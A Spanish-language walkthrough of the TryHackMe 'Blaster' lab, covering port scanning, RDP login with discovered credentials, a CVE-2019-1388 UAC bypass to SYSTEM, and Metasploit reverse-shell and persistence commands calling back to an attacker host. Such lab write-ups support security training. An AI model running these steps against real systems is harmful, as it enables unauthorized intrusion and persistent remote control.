Práctica de Seguridad Informática: Blaster en TryHackMe

Este artículo detalla un ejercicio práctico de pruebas de penetración en la máquina virtual "Blaster" alojada en TryHackMe. El objetivo es obtener acceso inicial y elevar privilegios en un sistema Windows.

Despliegue del Objetivo

Se debe activar la máquina virtual a través de la interfaz del laboratorio en TryHackMe. Tenga en cuenta que el sistema operativo objetivo es Windows y puede tomar varios minutos en estar disponible.

Obtención de Acceso Inicial

Análisis de Puertos

Realice un escaneo de puertos en la dirección IP del objetivo usando la herramienta nmap:

nmap -sV -Pn -p- --min-rate=5000 10.10.50.20

Los resultados muestran dos puertos abiertos: 80/tcp y 3389/tcp.

Exploración de Directorios

Utilice gobuster para buscar directorios ocultos en el servidor web:

gobuster dir -u http://10.10.50.20/ -w /usr/share/wordlists/dirb/common.txt -t 50

Se descubre el directorio /retro.

Descubrimiento de Información Sensible

Al visitar el directorio oculto, se identifica un posible nombre de usuario: "Wade". Navegando por el sitio, en la sección de comentarios se encuentra una contraseña candidata: "parzival".

Inicio de Sesión por RDP

Dado que el puerto 3389 está abierto (servicio de Escritorio Remoto), se utilizan las credenciales obtenidas para iniciar sesión con xfreerdp:

xfreerdp /u:Wade /p:parzival /v:10.10.50.20 /dynamic-resolution +clipboard

Dentro de la sesión de usuario, se localiza y lee el archivo user.txt en el escritorio, cuyo contenido es una bandera de captura.

Elevación de Privilegios

Tras acceder por RDP, se revisa el historial del navegador y se encuentra que el usuario investigó la vulnerabilidad CVE-2019-1388. En la papelera de reciclaje se localiza un ejecutable necesario para la explotación: hhupd.exe.

Explotación de CVE-2019-1388

Para elevar privilegios, se ejecuta hhupd.exe como administrador. Se sigue el procedimiento para bypass de UAC:

  1. Hacer clic en "show more" y luego en "show information about the publisher's certificate".
  2. Seleccionar el enlace "VeriSign Commercial Software Publishers CA.".
  3. En el navegador Internet Explorer abierto, ir a Configuración > Archivo > Guardar como.
  4. En el cuadro de nombre de archivo, ingresar C:\Windows\System32 y presionar Enter.
  5. Navegar hasta cmd.exe y ejecutarlo.

En la nueva consola, el comando whoami confirma que se ha obtenido acceso como nt authority\system. Se lee el archivo root.txt en el escritorio del administrador.

Fase Post-Explotcaión

Para mantener persistencia, se utiliza Metasploit Framework. Primero, se inicia la consola de Metasploit:

msfconsole -q

Se selecciona el módulo para entrega web:

use exploit/multi/script/web_delivery

Se configuran los parámetros necesarios:

set LHOST 192.168.1.100
set target 2
set payload windows/meterpreter/reverse_http
run -j

El comando generado por Metasploit se copia y ejecuta en la consola del objetivo (a través de la sesión RDP). Esto genera una sesión de Meterpreter en el atacante.

Para lograr persistencia, se utiliza el módulo local de persistencia. Se envía la sesión actual a segundo plano con bg y luego:

use exploit/windows/local/persistence
set session 1
set LHOST 192.168.1.100
set payload windows/meterpreter/reverse_tcp
run

Finalmente, se configura un manejador para escuchar conexiones entrantes y recuperar la sesión cuando el sistema objetivo se reinicie.

Etiquetas: TryHackMe nmap Gobuster Remote Desktop Protocol CVE-2019-1388

Publicado el 7-18 03:26